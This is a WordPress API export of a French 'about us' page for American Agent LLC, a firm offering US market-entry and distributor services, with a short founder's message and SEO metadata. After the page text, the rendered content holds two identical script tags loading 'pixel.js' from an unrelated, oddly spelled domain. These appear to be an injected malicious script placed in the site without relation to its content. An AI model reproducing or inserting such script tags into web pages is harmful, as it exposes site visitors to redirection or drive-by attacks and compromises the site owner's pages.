{"id":2985,"date":"2014-08-30T08:16:10","date_gmt":"2014-08-30T12:16:10","guid":{"rendered":"https:\/\/americanagent.com\/about-2\/"},"modified":"2014-09-18T11:19:43","modified_gmt":"2014-09-18T15:19:43","slug":"american-agent-qui-sommes-nous","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/","title":{"rendered":"American Agent LLC &#8211; Qui Sommes Nous?"},"content":{"rendered":"<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-0  el_before_av_two_third  avia-builder-el-first  first flex_column_div  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_image-d85ca24e05aa6c5b744b3518eefbcec3\">\n.avia-image-container.av-av_image-d85ca24e05aa6c5b744b3518eefbcec3 img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-av_image-d85ca24e05aa6c5b744b3518eefbcec3 .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-av_image-d85ca24e05aa6c5b744b3518eefbcec3 av-styling- avia_animated_image av-animated-when-visible-95 top-to-bottom avia-align-center  avia-builder-el-1  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-4021 avia-img-lazy-loading-not-4021 avia_image ' src=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg\" alt='' title='about'  height=\"2592\" width=\"2022\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about.jpg 2022w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-234x300.jpg 234w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-803x1030.jpg 803w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-1170x1500.jpg 1170w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-549x705.jpg 549w, https:\/\/americanagent.com\/wp-content\/uploads\/2014\/08\/about-450x576.jpg 450w\" sizes=\"(max-width: 2022px) 100vw, 2022px\" \/><\/div><\/div><\/div><\/div>\n<div  class='flex_column av-av_two_third-cae1f7b2f72c6a5cdf3719c4a548253a av_two_third  avia-builder-el-2  el_after_av_one_third  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-av_textblock-5423793a0e82d2455362b4eba580b48d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span class='av_dropcap1 av-av_dropcap1-3cd9da5fea0ef5fb27aee617571c39a3'><span style=\"color: #000000;\">D<\/span><\/span>epuis 2002, American Agent a aid\u00e9 des entreprises \u00e9trang\u00e8res \u00e0 s&#8217;implanter sur le march\u00e9 am\u00e9ricain avec les plus efficaces strat\u00e9gies de ventes possible.<\/p>\n<p>Notre objectif premier est de parvenir \u00e0 vous offrir une pr\u00e9sence optimale, la meilleure implantation de votre entreprise et organisation des circuits de distribution possibles.<\/p>\n<p>L&#8217;ensemble du secteur, les mod\u00e8les d&#8217;achat des entreprises am\u00e9ricaines ont chang\u00e9 de mani\u00e8re radicale au cours des derni\u00e8res ann\u00e9es. Si vous voulez p\u00e9n\u00e9trer sur le march\u00e9 d&#8217;USA, vous avez besoin d&#8217;un projet solide et devez consid\u00e9rer de nouvelles strategies.<\/p>\n<p>Je souhaite que notre collaboration vous soit profitable et que notre connaissance du march\u00e9 am\u00e9ricain soit un atout \u00e0 votre service, devenir une force de proposition en vous d\u00e9taillant les besoins, les tendances et les sp\u00e9cificit\u00e9s du march\u00e9 aux \u00c9tats-Unis.<\/p>\n<p>Cordialement<\/p>\n<p><strong>Mr. Kari Koivuniemi<\/strong><\/p>\n<p><strong>Fondateur et CEO<\/strong><\/p>\n<\/div><\/section><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-2985","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent LLC - Vendre aux \u00c9tats-Unis<\/title>\n<meta name=\"description\" content=\"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent LLC - Vendre aux \u00c9tats-Unis\" \/>\n<meta property=\"og:description\" content=\"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T15:19:43+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/american-agent-qui-sommes-nous\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/american-agent-qui-sommes-nous\\\/\",\"name\":\"American Agent LLC - Vendre aux \u00c9tats-Unis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2014-08-30T12:16:10+00:00\",\"dateModified\":\"2014-09-18T15:19:43+00:00\",\"description\":\"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/american-agent-qui-sommes-nous\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/american-agent-qui-sommes-nous\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/american-agent-qui-sommes-nous\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"American Agent LLC &#8211; Qui Sommes Nous?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent LLC - Vendre aux \u00c9tats-Unis","description":"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/","og_locale":"fr_FR","og_type":"article","og_title":"American Agent LLC - Vendre aux \u00c9tats-Unis","og_description":"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis","og_url":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T15:19:43+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/","url":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/","name":"American Agent LLC - Vendre aux \u00c9tats-Unis","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2014-08-30T12:16:10+00:00","dateModified":"2014-09-18T15:19:43+00:00","description":"Exporter et vendre sur le march\u00e9 des \u00c9tats-Unis. Comment vendre aux \u00c9tats-Unis. Percer sur le march\u00e9 des \u00c9tats-Unis","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/american-agent-qui-sommes-nous\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"American Agent LLC &#8211; Qui Sommes Nous?"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/2985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=2985"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/2985\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=2985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}